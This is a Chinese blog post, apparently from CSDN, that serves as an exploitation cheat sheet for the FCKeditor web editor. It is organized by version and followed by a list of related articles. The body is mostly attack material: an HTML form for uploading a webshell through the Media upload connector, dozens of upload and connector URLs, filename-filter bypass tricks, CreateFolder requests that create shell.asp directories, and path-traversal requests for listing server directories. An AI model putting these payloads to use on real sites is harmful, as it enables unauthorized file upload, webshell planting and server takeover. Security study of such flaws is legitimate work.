fckeditor编辑器漏洞

最新推荐文章于 2024-05-14 03:24:06 发布
最新推荐文章于 2024-05-14 03:24:06 发布
阅读量3.2k 收藏 2
点赞数 2
分类专栏: 上传漏洞 文章标签: fckeditor 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46230316/article/details/105365918
版权

查看fckeditor编辑器版本

 /_whatsnew.html

/editor/dialog/fck_about.html
  • 查出版本信息之后就可以到网上搜相应的漏洞

version2.2

Apache+linux 环境下在上传文件后面加个.突破

version<=2.4.2 For php

  • 该版本在处理PHP上传的地方没有对Media类型进行上传文件类型的控制,导致用户上传任意文件。
  • 将以下保存为html文件,action别忘了改成自己的,然后就可以上传木马,不知道上传路径就用bp抓包。
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.xxxx.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

test文件的上传地址(结合解析漏洞)

FCKeditor/editor/filemanager/browser/default/connectors/test.html(2.4.3)
FCKeditor/editor/filemanager/upload/test.html(2.4.3)
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
如图,发现有上传,但是有可能是测试用的,并不能真正上传木马,这时候去尝试其他的链接。
在这里插入图片描述

其他上传地址

FCKeditor/_samples/default.html(2.4.3)

FCKeditor/_samples/asp/sample01.asp(2.4.3)

FCKeditor/_samples/asp/sample02.asp(2.4.3)

FCKeditor/_samples/asp/sample03.asp(2.4.3)

FCKeditor/_samples/asp/sample04.asp(2.4.3)

FCKeditor/_samples/default.html

FCKeditor/editor/fckeditor.htm

FCKeditor/editor/fckdialog.html

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (2.6.3)

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/connectors/test.html(2.6.6)

FCKeditor/editor/filemanager/connectors/uploadtest.html(2.6.6)

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
可以尝试利用工具,如图。
在这里插入图片描述
在这里插入图片描述

突破文件名限制“.”变“_”下划线

1.提交1.php+空格绕过:空格只支持windows系统,linux系统是不支持的,可提交1.php+空格来绕过文件名限制。
2.可以在之前的文件夹x.asp下再新建一个文件夹xx.asp,这样只检测了第一级的目录xx.asp,如果第二级目录x.asp就不会受限制,把木马上传到x.asp中即可。可以通过下面的建立文件夹突破,也可以通过bp抓包
在这里插入图片描述
在这里插入图片描述
%2f在这里就是/,我们可以把这里改为/cc.asp
3.二次上传:继续上传同名文件可变为1.php;(1).jpg,很多时候上传的文件例如1.php;.jpg 会变为1_php;.jpg ,上传两次1.asp;jpg来突破。

突破建立文件夹

/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp

/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=124478997568

爆路径漏洞

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

FCKeditor被动限制策略所导致的过滤不严问题

影响版本: <= FCKeditor v2.4.3

FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

  • Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件,上传后它保存的文件直接用的$sFilePath=$sServerDir.$sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破。
  • 而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,其他上传漏洞中定义TYPE 变量时使用File类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。

jsp版本漏洞

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFold=/

上传马所在的目录:

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/

上传shell的地址:

FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector

列目录漏洞

1.修改CurrentFolder 参数使用 …/…/来进入不同的目录:
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=…/…/(2.4.1)
2.根据xml返回信息查看网站目录:
fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=…/…/…/&NewFolderName=shell.asp

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

3.获取当前文件夹

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
4.浏览E盘文件:
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/
5.FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页,可以查看已经上传的文件。
6.遍历目录
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=…/…

browser

fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=…/…/connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

mon0dy
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FCK编辑器漏洞综合利用工具
08-12
FCK编辑器漏洞综合利用工具
FCKEditor曝高危漏洞 360首发临时解决方案
bulebirds的专栏
04-24 831
近日,国外漏洞平台exploit-db曝光FCKEditor 最新版(2.6.8 Asp版)存在任意文件上传高危漏洞漏洞详情:http://www.exploit-db.com/exploits/23005/ ),黑客借助该漏洞能够直接上传木马、后门程序并控制服务器,最终造成网站数据被窃等严重后果。360网站安全检测发现,国内大量使用FCKEditor的网站都存在这一漏洞。 360网站安全检测
2024年【渗透测试】--- FCKeditor文本编辑器漏洞_ckeditor漏洞,保洁阿姨看完都会了
最新发布
2401_85013604的博客
05-14 500
迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
FCK编辑器漏洞利用工具
09-10
可以利用FCK编辑器漏洞的工具,具体利用方法见附件文档。
记Fckeditor漏洞
zhangpeng999123的博客
03-07 2112
首先是对目标站点进行了基本的测试然后发现了存在fckeditor,fckeditor漏洞有很多,基本asp的都被通杀了,大家可以在网上看看。首先看看编辑器的版本: $ http://xxxxxxx.com/fckeditor/editor/dialog/fck_about.html 查看版本信息: 版本信息 可以看到是2.6.6的版本,那就对症下药。同时提一下,查看版...
fck编辑器漏洞利用_KindEditor上传漏洞预警
weixin_35474374的博客
12-25 415
1. 上传漏洞近日,安恒明鉴网站安全监测平台和应急响应中心监测发现近百起党政机关网站被植入色情广告页面,通过分析发现被植入色情广告页面的网站都使用了KindEditor编辑器组件,早在2017年GitHub上已有报告了KindEditor编辑器存在文件上传漏洞的分析,参考:https://github.com/kindsoft/kindeditor/issues/249根据报告,主要由u...
FCK编辑器综合利用工具.exe
07-19
fckeditor综合利用工具,图形化界面,简单易上手
web安全-上传漏洞-fck编辑器利用
Coisini的博客
05-31 2400
本节工具: FCK编辑器漏洞综合利用工具 Burpsuite抓包工具BurpSuite破解版及安装教程 FCK编辑器(FCKEditor 富文本编辑器) FCKeditor简介 FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。它志于轻量化,不需要太复杂的安装步骤即可使用。它可和PHP、 JavaScript、ASP、ASP.NET、ColdFusion、Java、以及...
常用网页编辑器漏洞手册(全面版)fckeditor,ewebeditor
10-28
常用网页编辑器漏洞手册(全面版)fckeditor,ewebeditor,使用这类编辑器的朋友一定要注意下。
fckeditor编辑器上传——含有点变成下划线限制的源码包
12-08
fckeditor编辑器上传漏洞,含有点变成下划线限制的源码包,IIS搭建即可。如有侵权请联系CSDN管理员删除
FCKeditor2.6.3文本编辑器
09-07
工程目录下FCKeditor/FCKeditor-v2.6.3/fckeditor/_samples/default.html文件是我根据自己的理解对它的文档进行修改的测试程序,所以只能作为参考,未必正确
网页编辑器漏洞大全
07-13
涵盖了诸如常见的FCKeditor、eWebEditor、Cuteditor、Freetextbox、Webhtmleditor、Kindeditor、所谓的eWebEditorNET、所谓的 southidceditor、所谓的bigcneditor
针对PHP环境下Fckeditor编辑器上传图片配置详细教程
10-26
今天介绍Fckeditor上传图片功能在PHP中的配置方法,涉及Fckeditor上传图片的上传路径配置、限制Fckeditor上传图片大小设置、Fckeditor上传图片文件名重名及乱码解决方法以及针对上传图片添加水印功能的实现方法,...
fck编辑器漏洞利用_2020-12微软漏洞通告
weixin_36440319的博客
12-28 175
微软官方发布了12月的安全更新。本月更新公布了59个漏洞,包含23个远程代码执行漏洞,14个特权提升漏洞,9个信息泄露漏洞以及6个身份假冒漏洞,其中9个漏洞级别为“Critical”(高危),48个为“Important”(严重)。建议用户及时使用火绒安全软件(个人/企业)【漏洞修复】功能更新补丁。 涉及组件:Microsoft WindowsMicrosoft Edge (EdgeHTML-ba...
PHP-XXE-Lab——漏洞利用
W小哥
12-22 1747
一、环境搭建 环境源码下载地址:https://github.com/c0ny1/xxe-lab 下载后,php_xxe放在网站根目录即可运行 二、漏洞利用 访问目标网站,如下图所示 输入用户名、密码后,使用burpsuite拦截数据包,仔细观察传输数据的部分,跟大多数传输数据方式不一样 大多数传递方式,是下面这两种 所以,如果在渗透测试过程中,发现POST数据传递方式是 adminpassword 则说明,网站是采用的XML语言接收的数据,此处可能存在XXE漏洞 接下来,利用XXE漏洞读取敏感文件
FCKeditor编辑器漏洞
谢公子的博客
04-07 4583
目录 FCKeditor asp网页 aspx网页 php网页 jsp网页 FCKeditor FCKeditor是一个功能强大支持所见即所得功能的文本编辑器,可以为用户提供微软office软件一样的在线文档编辑服务。它不需要安装任何形式的客户端,兼容绝大多数主流浏览器,支持ASP.Net、ASP、ColdFusion 、PHP、Java、Active-FoxPro、Lasso、P...
fckeditor漏洞_三十,文件上传漏洞编辑器漏洞和IIS高版本漏洞及防御
qq_50854662的博客
11-08 4580
fckeditor漏洞_三十,文件上传漏洞编辑器漏洞和IIS高版本漏洞及防御
FCKeditor 2.4.3文件上传漏洞 ——合天网安实验室学习笔记
weixin_42582241的博客
02-22 2762
实验链接 FCKeditor是一款开放源码的文本编辑器,其2.4.3版本upload.php文件使用黑名单进行文件校验,通过实验学习如何绕过黑名单检测,上传恶意文件。 链接:http://www.hetianlab.com/expc.do?ce=374758bd-360d-44ac-8db5-a60ac5c25866 实验简介 实验所属系列: Web安全 实验对象: 本科/专科信息安全专业 相关课...
FCKeditor上传漏洞总结
热门推荐
龙哥盟
02-19 5万+
一、PHP网站的安全性问题针对PHP的网站主要存在下面几种攻击方式:1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injection) 6、跨网站请求伪造攻击(Cross Sit
fckeditor漏洞
07-27
回答: FCKeditor曾经存在一些漏洞,但是新版FCKeditor已经修复了这些漏洞。\[3\]在以前的版本中,存在一些常见的利用方式,比如通过上传文件来执行恶意代码。\[2\]然而,新版FCKeditor已经修复了这些问题,并且不再容易受到这些漏洞的攻击。因此,如果您使用的是最新版本的FCKeditor,您不需要担心这些漏洞的问题。 #### 引用[.reference_title] - *1* *3* [FCKeditor编辑器漏洞](https://blog.csdn.net/lyshark_lyshark/article/details/125852506)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [【渗透测试】--- FCKeditor文本编辑器漏洞](https://blog.csdn.net/qq_43168364/article/details/111605583)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值